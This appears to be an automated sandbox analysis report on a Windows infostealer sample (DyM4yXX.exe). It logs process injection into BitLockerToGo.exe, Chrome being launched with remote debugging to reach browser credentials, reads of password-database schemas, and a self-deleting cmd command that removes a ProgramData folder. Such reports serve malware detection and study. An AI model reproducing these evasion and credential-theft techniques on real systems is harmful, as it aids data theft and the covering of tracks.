            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_0049A4414_2_0049A441
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_004B24114_2_004B2411
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_004994F14_2_004994F1
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_004AF4914_2_004AF491
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_004B15014_2_004B1501
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_0049B5214_2_0049B521
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_004AF5214_2_004AF521
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_004B05314_2_004B0531
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_004AF5C14_2_004AF5C1
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_004B05D14_2_004B05D1
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_0049B5F14_2_0049B5F1
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_004995B14_2_004995B1
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_004836414_2_00483641
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_0049A6314_2_0049A631
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_004B16314_2_004B1631
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_004A06D14_2_004A06D1
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_004986F14_2_004986F1
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_004AE6814_2_004AE681
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_0049A7414_2_0049A741
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_004AE7414_2_004AE741
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_004A37714_2_004A3771
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_004AE7F14_2_004AE7F1
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_004A07B14_2_004A07B1
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_004AF7B14_2_004AF7B1
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_004AF8514_2_004AF851
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_004998614_2_00499861
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_004988114_2_00498811
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_0049A8114_2_0049A811
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_004838114_2_00483811
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_004B08314_2_004B0831
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_004A38314_2_004A3831
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_004988E14_2_004988E1
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_004A38F14_2_004A38F1
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_004AF8F14_2_004AF8F1
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_004AE8914_2_004AE891
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_004A08A14_2_004A08A1
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_0049B8B14_2_0049B8B1
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_004A09414_2_004A0941
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_004AE9514_2_004AE951
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_0049A9014_2_0049A901
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_004839014_2_00483901
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_004999F14_2_004999F1
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_004A39F14_2_004A39F1
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_004AF9814_2_004AF981
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_0049AA014_2_0049AA01
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_004B0A114_2_004B0A11
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_004A3AC14_2_004A3AC1
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_0049AAD14_2_0049AAD1
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_00499A814_2_00499A81
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_004A0AA14_2_004A0AA1
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_00483AB14_2_00483AB1
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_0049AB714_2_0049AB71
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_004B0B314_2_004B0B31
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_00483BC14_2_00483BC1
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_004A3B914_2_004A3B91
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_0049BBA14_2_0049BBA1
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_004ADC414_2_004ADC41
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_00498C714_2_00498C71
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_00499C014_2_00499C01
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_004B0C014_2_004B0C01
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_004AECC14_2_004AECC1
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_004B0CD14_2_004B0CD1
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_004A3CE14_2_004A3CE1
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_0049BCB14_2_0049BCB1
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_004AFCB14_2_004AFCB1
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_0049BD714_2_0049BD71
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_004ADD014_2_004ADD01
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_00499D114_2_00499D11
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_004AFDD14_2_004AFDD1
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_004ADDE14_2_004ADDE1
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_004A3DF14_2_004A3DF1
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_0049AD914_2_0049AD91
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_004B0E214_2_004B0E21
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_0049AE314_2_0049AE31
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_00498EF14_2_00498EF1
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_004A0E914_2_004A0E91
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_004B6EA24_2_004B6EA2
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_004AFEA14_2_004AFEA1
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_00499EB14_2_00499EB1
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_0049AF614_2_0049AF61
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_004B0F614_2_004B0F61
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_004A0F614_2_004A0F61
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_00499F714_2_00499F71
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_004A3F014_2_004A3F01
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_004ADF314_2_004ADF31
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_004B0FF14_2_004B0FF1
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_004ADFF14_2_004ADFF1
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_004AEFA14_2_004AEFA1
            Source: DyM4yXX.exe, 00000000.00000003.1980706641.0000000009C94000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBITLOCKERTOGO.EXEj% vs DyM4yXX.exe
            Source: DyM4yXX.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DEBUG_STRIPPED
            Source: 00000000.00000003.1980406859.0000000009D92000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@24/24@8/7
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_004A01FF CreateToolhelp32Snapshot,Process32First,4_2_004A01FF
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\97RJHELQ.htmJump to behavior
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7672:120:WilError_03
            Source: DyM4yXX.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile read: C:\$Recycle.Bin\S-1-5-21-2246122658-3693405117-2476756634-1002\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\DyM4yXX.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: f3ekn7q1v.4.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: DyM4yXX.exeReversingLabs: Detection: 21%
            Source: DyM4yXX.exeString found in binary or memory: net/addrselect.go
            Source: DyM4yXX.exeString found in binary or memory: github.com/saferwall/pe@v1.5.6/loadconfig.go
            Source: DyM4yXX.exeString found in binary or memory: github.com/xo/terminfo@v0.0.0-20220910002029-abceb7e1c41e/load.go
            Source: unknownProcess created: C:\Users\user\Desktop\DyM4yXX.exe "C:\Users\user\Desktop\DyM4yXX.exe"
            Source: C:\Users\user\Desktop\DyM4yXX.exeProcess created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2556 --field-trial-handle=2460,i,7943810038441131644,12745396479495106010,262144 /prefetch:8
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\riwlf" & exit
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
            Source: C:\Users\user\Desktop\DyM4yXX.exeProcess created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"Jump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"Jump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\riwlf" & exitJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2556 --field-trial-handle=2460,i,7943810038441131644,12745396479495106010,262144 /prefetch:8Jump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10Jump to behavior
            Source: C:\Users\user\Desktop\DyM4yXX.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\DyM4yXX.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\DyM4yXX.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\DyM4yXX.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Users\user\Desktop\DyM4yXX.exeSection loaded: umpdc.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: dbghelp.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ntshrui.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: cscapi.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: linkinfo.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: slc.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: pcacli.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: sfc_os.dllJump to behavior
            Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
            Source: DyM4yXX.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
            Source: DyM4yXX.exeStatic file information: File size 5594624 > 1048576
            Source: DyM4yXX.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x275c00
            Source: DyM4yXX.exeStatic PE information: Raw size of .rdata is bigger than: 0x100000 < 0x289a00
            Source: DyM4yXX.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
            Source: Binary string: BitLockerToGo.pdb source: DyM4yXX.exe, 00000000.00000003.1980811552.0000000009C84000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: BitLockerToGo.pdbGCTL source: DyM4yXX.exe, 00000000.00000003.1980811552.0000000009C84000.00000004.00001000.00020000.00000000.sdmp
            Source: DyM4yXX.exeStatic PE information: section name: .symtab
            Source: C:\Users\user\Desktop\DyM4yXX.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DyM4yXX.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\timeout.exe TID: 7728Thread sleep count: 83 > 30Jump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_0049008C FindFirstFileA,4_2_0049008C
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_004A91EA FindFirstFileA,4_2_004A91EA
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_004A8248 FindFirstFileA,4_2_004A8248
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_004AA4E5 FindFirstFileA,4_2_004AA4E5
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_0048E749 FindFirstFileA,4_2_0048E749
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_0048177C FindFirstFileA,4_2_0048177C
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_00492AC9 FindFirstFileA,4_2_00492AC9
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_0048CCEA FindFirstFileA,4_2_0048CCEA
